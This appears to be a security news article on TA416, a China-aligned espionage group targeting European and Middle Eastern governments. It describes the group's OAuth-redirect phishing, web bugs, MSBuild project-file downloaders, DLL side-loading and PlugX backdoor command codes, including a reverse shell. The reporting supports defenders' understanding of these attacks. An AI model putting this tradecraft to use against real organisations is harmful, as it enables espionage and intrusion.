China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing

A China-aligned threat actor known as TA416 has resumed targeting European government and diplomatic organizations since mid-2025, following a two-year period of minimal activity in the region. The campaign, attributed to the cluster also tracked as DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda, represents a significant shift in targeting priorities for this sophisticated cyber espionage group.

Sophisticated Attack Techniques Emerge

The threat actor has demonstrated remarkable adaptability in its infection chains, regularly altering its approach to evade detection. TA416 has abused Cloudflare Turnstile challenge pages, leveraged OAuth redirects, and employed C# project files to deliver its custom PlugX payload. This continuous evolution of tactics makes the group particularly challenging to defend against.

In December 2025, TA416 began leveraging third-party Microsoft Entra ID cloud applications to initiate redirects that ultimately lead to the download of malicious archives. The phishing emails contain links to Microsoft's legitimate OAuth authorization endpoint, which when clicked, redirect users to attacker-controlled domains and deploy the PlugX backdoor.

Multi-Vector Campaign Strategy

TA416's renewed focus on European entities involves a mix of web bug and malware delivery campaigns. The threat actors use freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor through malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances.

Web bugs—tiny invisible objects embedded in emails—trigger HTTP requests to remote servers when opened, revealing the recipient's IP address, user agent, and time of access. This reconnaissance technique allows the threat actor to assess whether emails were opened by intended targets before deploying more sophisticated malware.

Advanced Malware Delivery Methods

In February 2026, TA416 refined its attack chain by linking to archives hosted on Google Drive or compromised SharePoint instances. These downloaded archives include a legitimate Microsoft MSBuild executable paired with a malicious C# project file. When the MSBuild executable runs, it automatically builds the project file, which acts as a downloader.

The CSPROJ file decodes three Base64-encoded URLs to fetch a DLL side-loading triad from TA416-controlled domains, saving them to the user's temp directory and executing a legitimate executable to load PlugX via the group's typical DLL side-loading chain.

PlugX Malware Capabilities

The PlugX backdoor remains a consistent presence throughout TA416's intrusions, though the legitimate, signed executables abused for DLL side-loading have varied over time. The malware establishes an encrypted communication channel with its command-and-control server after performing anti-analysis checks to sidestep detection.

PlugX accepts five different commands:

• 0x00000002: Capture system information
• 0x00001005: Uninstall the malware
• 0x00001007: Adjust beaconing interval and timeout parameter
• 0x00003004: Download a new payload (EXE, DLL, or DAT) and execute it
• 0x00007002: Open a reverse command shell

Geopolitical Motivations and Expansion

The shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, aligns with a renewed intelligence-collection focus against EU and NATO-affiliated diplomatic entities. Additionally, TA416 expanded to Middle Eastern government targeting in March 2026, likely influenced by geopolitical flashpoints and escalations in the region.

This campaign expansion follows the outbreak of the U.S.-Israel-Iran conflict in late February 2026, suggesting the group is gathering regional intelligence pertaining to the conflict.

Connection to Broader Threat Landscape

TA416 shares historical technical overlaps with another cluster known as Mustang Panda (aka CerenaKeeper, Red Ishtar, and UNK_SteadySplit). Both activity groups are collectively tracked under monikers including Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon.

While TA416 uses bespoke PlugX variants, the Mustang Panda cluster has deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What's common to both is the use of DLL side-loading to launch malware.

Industry Response and Detection

Microsoft has warned of phishing campaigns targeting government and public-sector organizations that employ OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The use of legitimate OAuth endpoints makes these attacks particularly effective at evading traditional security controls.

The disclosure comes as Darktrace revealed that Chinese-nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with intent to establish long-term persistence within critical infrastructure networks.

Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved exploitation of internet-facing infrastructure to obtain initial access.

In one notable case, the actor had fully compromised the environment and established persistence, only to resurface more than 600 days after the initial compromise. This operational pause underscores both the depth of the intrusion and the actor's long-term strategic intent.

The sophistication and persistence demonstrated by TA416 highlight the evolving nature of state-sponsored cyber espionage, with threat actors continuously adapting their techniques to target high-value diplomatic and government entities across multiple regions simultaneously.